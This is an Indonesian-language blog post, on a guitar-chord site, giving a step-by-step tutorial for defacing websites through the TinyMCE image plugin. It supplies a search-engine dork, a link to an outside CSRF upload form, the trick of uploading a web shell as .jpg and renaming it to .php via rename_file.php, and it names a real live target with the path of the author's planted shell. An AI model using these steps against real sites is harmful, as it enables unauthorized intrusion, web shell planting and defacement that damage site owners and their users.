. Tutorial Deface Dengan Cara TinyMce Plugins Image Manager - Kumpulan Kunci Gitar Lagu Terbaru

Featured Post

Chord Gitar Ajari Aku Mencintaimu - Jamrud Terbaru

Ajari Aku Mencintaimu - Jamrud Intro:  D D Bukan ku tak mau C#m        F#m   Bm       B Mengucap sgala kelebihanmu            Em Bukanya ak...

Home Deface Tutorial Deface Dengan Cara TinyMce Plugins Image Manager

Tutorial Deface Dengan Cara TinyMce Plugins Image Manager

Ditulis oleh Tambah Komentar

Tutorial Deface Dengan Cara TinyMce Plugins Image Manager - Selamat Datang sahabat Kumpulan Kunci Gitar Lagu Terbaru, Pada Artikel yang anda baca kali ini dengan judul Tutorial Deface Dengan Cara TinyMce Plugins Image Manager, kami telah mempersiapkan artikel ini dengan baik untuk anda baca dan ambil informasi didalamnya. Mudah-mudahan isi postingan Artikel Deface, yang kami tulis ini ada manfaatnya. Baiklah, selamat membaca.

Judul : Tutorial Deface Dengan Cara TinyMce Plugins Image Manager
Link : Tutorial Deface Dengan Cara TinyMce Plugins Image Manager

Sebenarnya tutorial deface ini udh ada dari lama, cuman karna sibuk sama real life jadi ga sempet nulis tutorial

Ok kali ini gw share deface POC TinyMce Plugins Image Manager 
caranya cukup mudah, , siapkan dulu shell yang ber extensi .jpg

Ok langsung aja

DORK : inurl:/tinymce/plugins/image/ ( Selebihnya kembangkan sendiri )

Exploit : site.com/(path)/tinymce/plugins/image/upload.php

Live Target : https://www.madisonts.com/js/tinymce/plugins/image/upload.php

1. Kalian dorking dulu ke google, bing atau search engine lainnya, pke dork di atas yg gw kasih


2. site yg vuln seperti ini

     Vuln tidak juga ada yg seperti itu, ada juga yg blank seperti ini



3. Selanjutnya salin url nya, upload shell menggunakan CSRF nya ada di sini http://trolling-system.ooo/csrf.txt kalian upload di web dengan nama csrf.php

4. Upload extensi shell .jpg  , inget jangan langsung upload ext .php, upload menggunakan csrf di atas yg gw kasih, ubah bagian <form action="site.com" dengan web yg vuln



5. lalu upload shell ext jpg nya, kalau sukses muncul seperti ini


6. Nah kalau muncul sepeti ini salin tulisan FILE-20180702-0754DCWUCH8NHQFC.jpg nah yang kaya gitu

7. Lalu kita disini mengubah shell jpg kita menjadi php, gimana caranya? sans ikutin

http://site.com/[path]/tinymce/plugins/image/rename_file.php?current_name=NAMA-FILE-SHELL-YANG-BERHASIL-DI-UPLOAD.jpg&new_name=namashellbaru.php

Ga ngerti? ok contoh seperti ini

https://www.madisonts.com/js/tinymce/plugins/image/rename_file.php?current_name=FILE-20180702-0754DCWUCH8NHQFC.jpg&new_name=bacot.php


8. kalau success muncul tulisan banyak seperti ini


9. tinggal kita akses deh
akses shell : site.com/[path]/tinymce/plugins/image/uploads/namashellyangbaru.php

look >> https://www.madisonts.com/js/tinymce/plugins/image/uploads/bacot.php nah ini shell gw



mudah bukan? eheheh
ada yang masih kurang ngerti? Jangan ragu untuk bertanya

Ok sekian..
terima kasih sudah berkunjung
logo
Jangan Lupa Tinggalkan Jejak.
  • Facebook
  • WhatsApp
  • Instagram

    • Subscribe Our Newsletter

    Related Posts

    Buka Komentar
    Tutup Komentar

    Belum ada Komentar untuk "Tutorial Deface Dengan Cara TinyMce Plugins Image Manager"

    Posting Komentar

    Langganan: Posting Komentar (Atom)

    Iklan Atas Artikel

    Your ads2

    Iklan Tengah Artikel 1

    IKLAN A

    Iklan Tengah Artikel 2

    IKLAN B

    Iklan Bawah Artikel

    IKLAN C